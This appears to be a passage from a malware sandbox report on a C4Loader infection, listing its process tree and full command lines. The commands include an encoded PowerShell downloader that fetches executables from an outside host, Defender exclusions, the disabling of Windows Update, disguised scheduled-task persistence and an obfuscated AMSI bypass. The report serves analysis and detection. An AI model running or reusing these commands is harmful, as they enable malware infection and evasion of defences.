OpenWith.exeC4Loader.exeRegSvcs.exepowershell.exenew2.execmd.execmd.execmd.exeSmartDefRun.exedescription pid process target process PID 4440 wrote to memory of 3432 4440 OpenWith.exe 7zFM.exe PID 4440 wrote to memory of 3432 4440 OpenWith.exe 7zFM.exe PID 2368 wrote to memory of 3208 2368 C4Loader.exe RegSvcs.exe PID 2368 wrote to memory of 3208 2368 C4Loader.exe RegSvcs.exe PID 2368 wrote to memory of 3208 2368 C4Loader.exe RegSvcs.exe PID 2368 wrote to memory of 3208 2368 C4Loader.exe RegSvcs.exe PID 2368 wrote to memory of 3208 2368 C4Loader.exe RegSvcs.exe PID 3208 wrote to memory of 2412 3208 RegSvcs.exe powershell.exe PID 3208 wrote to memory of 2412 3208 RegSvcs.exe powershell.exe PID 3208 wrote to memory of 2412 3208 RegSvcs.exe powershell.exe PID 2412 wrote to memory of 432 2412 powershell.exe C4Loader.exe PID 2412 wrote to memory of 432 2412 powershell.exe C4Loader.exe PID 2412 wrote to memory of 432 2412 powershell.exe C4Loader.exe PID 2412 wrote to memory of 1128 2412 powershell.exe new2.exe PID 2412 wrote to memory of 1128 2412 powershell.exe new2.exe PID 2412 wrote to memory of 3748 2412 powershell.exe SysApp.exe PID 2412 wrote to memory of 3748 2412 powershell.exe SysApp.exe PID 2412 wrote to memory of 3748 2412 powershell.exe SysApp.exe PID 2412 wrote to memory of 1120 2412 powershell.exe SmartDefRun.exe PID 2412 wrote to memory of 1120 2412 powershell.exe SmartDefRun.exe PID 1128 wrote to memory of 4340 1128 new2.exe wmic.exe PID 1128 wrote to memory of 4340 1128 new2.exe wmic.exe PID 1128 wrote to memory of 4080 1128 new2.exe cmd.exe PID 1128 wrote to memory of 4080 1128 new2.exe cmd.exe PID 4080 wrote to memory of 4652 4080 cmd.exe WMIC.exe PID 4080 wrote to memory of 4652 4080 cmd.exe WMIC.exe PID 1128 wrote to memory of 1632 1128 new2.exe cmd.exe PID 1128 wrote to memory of 1632 1128 new2.exe cmd.exe PID 1632 wrote to memory of 2096 1632 cmd.exe WMIC.exe PID 1632 wrote to memory of 2096 1632 cmd.exe WMIC.exe PID 4616 wrote to memory of 4128 4616 cmd.exe sc.exe PID 4616 wrote to memory of 4128 4616 cmd.exe sc.exe PID 4616 wrote to memory of 716 4616 cmd.exe sc.exe PID 4616 wrote to memory of 716 4616 cmd.exe sc.exe PID 4616 wrote to memory of 4200 4616 cmd.exe sc.exe PID 4616 wrote to memory of 4200 4616 cmd.exe sc.exe PID 4616 wrote to memory of 1492 4616 cmd.exe sc.exe PID 4616 wrote to memory of 1492 4616 cmd.exe sc.exe PID 4616 wrote to memory of 748 4616 cmd.exe sc.exe PID 4616 wrote to memory of 748 4616 cmd.exe sc.exe PID 4616 wrote to memory of 3332 4616 cmd.exe reg.exe PID 4616 wrote to memory of 3332 4616 cmd.exe reg.exe PID 4616 wrote to memory of 2080 4616 cmd.exe reg.exe PID 4616 wrote to memory of 2080 4616 cmd.exe reg.exe PID 4616 wrote to memory of 3328 4616 cmd.exe reg.exe PID 4616 wrote to memory of 3328 4616 cmd.exe reg.exe PID 4616 wrote to memory of 2848 4616 cmd.exe reg.exe PID 4616 wrote to memory of 2848 4616 cmd.exe reg.exe PID 4616 wrote to memory of 1148 4616 cmd.exe reg.exe PID 4616 wrote to memory of 1148 4616 cmd.exe reg.exe PID 1120 wrote to memory of 2696 1120 SmartDefRun.exe dialer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\C4Loader.rar2⤵
- Modifies registry class
-
C:\Users\Admin\Desktop\C4Loader.exe"C:\Users\Admin\Desktop\C4Loader.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAZgBuACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdQB1AHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBuAHkAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZQBlAG4AIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwB5AHYAdAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHYAaQBoACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHoAZgBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwBoAGMAcQAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGcAcwB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAagBwAG4AIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBzAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBqAHYAeAAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBxAHkAbQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAdAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGkAeQBnACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAGUAaABkACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBiAHgAZwAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHMAYwBiACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHMAZwBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwB1AHIAZAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB0AGoAbAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcQBqAHMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBwAGMAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBxAGkAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagBqAHgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAeQB5AGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdwBzAGQAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAbAB0ACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB0AGoAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwB2AHIAdQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAagByAHcAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBwAGcAdQAjAD4A"4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\new2.exe"C:\Users\Admin\AppData\Local\Temp\new2.exe"5⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\wmic.exewmic os get Caption6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /C "wmic cpu get name"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic cpu get name7⤵
-
C:\Users\Admin\AppData\Local\Temp\SysApp.exe"C:\Users\Admin\AppData\Local\Temp\SysApp.exe"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"5⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2368 -s 2763⤵
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\dialer.exeC:\Windows\System32\dialer.exe2⤵
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files\7-Zip\7zFM.exe"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\C4Loader.rar"2⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 2368 -ip 23681⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:pICYGROwCRXF{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZdxPjQyPfYYyVD,[Parameter(Position=1)][Type]$SesavlMLMI)$QEEQdaLBlpU=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+'e'+''+[Char](100)+''+[Char](68)+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+'M'+'e'+[Char](109)+''+'o'+'r'+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType(''+[Char](77)+''+'y'+''+[Char](68)+''+'e'+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+'e'+[Char](84)+''+[Char](121)+''+[Char](112)+''+[Char](101)+'','Cla'+'s'+''+[Char](115)+''+','+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'S'+''+'e'+''+[Char](97)+''+[Char](108)+''+[Char](101)+'d'+','+'A'+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+''+[Char](108)+'as'+[Char](115)+''+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+''+[Char](111)+''+'C'+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$QEEQdaLBlpU.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](78)+''+'a'+''+'m'+''+[Char](101)+','+'H'+'i'+[Char](100)+''+'e'+''+[Char](66)+'y'+[Char](83)+''+'i'+''+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+','+'M'+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$QEEQdaLBlpU.DefineMethod(''+[Char](73)+''+[Char](110)+''+'v'+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+''+'u'+''+[Char](98)+''+'l'+'i'+[Char](99)+''+','+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+'N'+''+[Char](101)+''+[Char](119)+'S'+'l'+''+[Char](111)+''+[Char](116)+',V'+[Char](105)+'r'+[Char](116)+''+'u'+'a'+'l'+'',$SesavlMLMI,$ZdxPjQyPfYYyVD).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+'M'+'a'+''+[Char](110)+'a'+'g'+''+[Char](101)+'d');Write-Output $QEEQdaLBlpU.CreateType();}$cxRaBWSPpMDkU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+'s'+''+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'')}).GetType('M'+[Char](105)+''+[Char](99)+''+[Char](114)+''+'o'+''+'s'+''+[Char](111)+''+[Char](102)+'t'+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+'.'+'U'+'n'+[Char](115)+''+[Char](97)+'f'+[Char](101)+''+'c'+''+[Char](120)+''+'R'+''+[Char](97)+''+'B'+'W'+[Char](83)+''+[Char](80)+'pMD'+'k'+''+[Char](85)+'');$rtNPooQaPbkcFs=$cxRaBWSPpMDkU.GetMethod(''+[Char](114)+''+'t'+'N'+[Char](80)+'oo'+'Q'+''+[Char](97)+'P'+[Char](98)+''+[Char](107)+''+[Char](99)+''+'F'+''+[Char](115)+'',[Reflection.BindingFlags]''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+[Char](105)+'c',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$SHklVYAZjDGGBodnkCk=pICYGROwCRXF @([String])([IntPtr]);$XrpSHMKYXyxTQgBIFVvqTe=pICYGROwCRXF @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$IxDkTDmIiUi=$cxRaBWSPpMDkU.GetMethod(''+[Char](71)+''+'e'+''+'t'+''+[Char](77)+''+'o'+''+[Char](100)+'u'+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+'3'+'2'+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'')));$kQZvEzPRPfGcaz=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+[Char](76)+'oa'+[Char](100)+''+'L'+'i'+[Char](98)+''+[Char](114)+''+'a'+'r'+[Char](121)+''+[Char](65)+'')));$THqHVJknzLzQAPEUb=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$IxDkTDmIiUi,[Object](''+'V'+''+'i'+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+'a'+''+'l'+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$fRxIkkm=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($kQZvEzPRPfGcaz,$SHklVYAZjDGGBodnkCk).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.d'+[Char](108)+'l');$tnErEZoMvwDawuSoX=$rtNPooQaPbkcFs.Invoke($Null,@([Object]$fRxIkkm,[Object](''+[Char](65)+''+'m'+''+'s'+''+'i'+'S'+'c'+''+[Char](97)+''+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$fNdVmVWadv=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,4,[ref]$fNdVmVWadv);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tnErEZoMvwDawuSoX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($THqHVJknzLzQAPEUb,$XrpSHMKYXyxTQgBIFVvqTe).Invoke($tnErEZoMvwDawuSoX,[uint32]8,0x20,[ref]$fNdVmVWadv);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+[Char](70)+''+[Char](84)+''+[Char](87)+''+'A'+''+'R'+'E').GetValue(''+'d'+''+[Char](105)+'ale'+'r'+''+'s'+''+[Char](116)+'a'+[Char](103)+''+'e'+''+'r'+'')).EntryPoint.Invoke($Null,$Null)1⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:TjDgzZKfBzwu{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$lKEaQBCfKajnZW,[Parameter(Position=1)][Type]$tYyjqdaeOz)$CiGPUhnWVIn=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+''+'t'+'ed'+'D'+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+'M'+''+[Char](101)+''+[Char](109)+'o'+[Char](114)+'y'+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+[Char](68)+''+'e'+''+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+[Char](44)+'P'+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+'c'+',Se'+'a'+'le'+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'i'+[Char](67)+''+'l'+'a'+[Char](115)+''+'s'+''+[Char](44)+''+[Char](65)+'ut'+'o'+'C'+[Char](108)+'a'+'s'+''+[Char](115)+'',[MulticastDelegate]);$CiGPUhnWVIn.DefineConstructor(''+[Char](82)+''+[Char](84)+''+'S'+''+'p'+''+'e'+''+'c'+''+'i'+''+[Char](97)+''+[Char](108)+'N'+'a'+''+[Char](109)+''+'e'+''+','+'H'+'i'+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$lKEaQBCfKajnZW).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+'i'+'m'+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+'n'+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$CiGPUhnWVIn.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'','Publ'+'i'+''+'c'+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+'ig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+'S'+'l'+'o'+'t'+','+'V'+'i'+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l',$tYyjqdaeOz,$lKEaQBCfKajnZW).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $CiGPUhnWVIn.CreateType();}$MwBchzsQZJOZn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+'d'+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'r'+'o'+''+[Char](115)+''+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+'Wi'+[Char](110)+'3'+[Char](50)+''+'.'+'U'+[Char](110)+'s'+[Char](97)+'fe'+[Char](77)+''+[Char](119)+''+[Char](66)+''+'c'+''+[Char](104)+''+'z'+''+[Char](115)+''+[Char](81)+''+[Char](90)+'J'+'O'+''+[Char](90)+''+'n'+'');$JHYrFqSKiGCkbg=$MwBchzsQZJOZn.GetMethod(''+[Char](74)+'HY'+[Char](114)+''+'F'+''+[Char](113)+''+[Char](83)+'Ki'+[Char](71)+''+[Char](67)+'kbg',[Reflection.BindingFlags]''+'P'+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$hPwTQzyZHTUemWpXfpr=TjDgzZKfBzwu @([String])([IntPtr]);$TsFQsekblSBnRuFOhrywDr=TjDgzZKfBzwu @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$AAtWwKYCpza=$MwBchzsQZJOZn.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+'M'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+''+'H'+''+[Char](97)+'n'+'d'+'le').Invoke($Null,@([Object](''+'k'+''+'e'+''+[Char](114)+'n'+'e'+''+'l'+''+'3'+'2.'+[Char](100)+''+[Char](108)+''+[Char](108)+'')));$bcTYqBfQqPuDDJ=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'L'+'o'+'a'+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+'b'+'r'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$mOVKLcrQlQOhzWsAv=$JHYrFqSKiGCkbg.Invoke($Null,@([Object]$AAtWwKYCpza,[Object](''+'V'+''+'i'+''+'r'+''+[Char](116)+''+[Char](117)+''+'a'+''+[Char](108)+''+[Char](80)+''+'r'+'ot'+[Char](101)+''+'c'+''+[C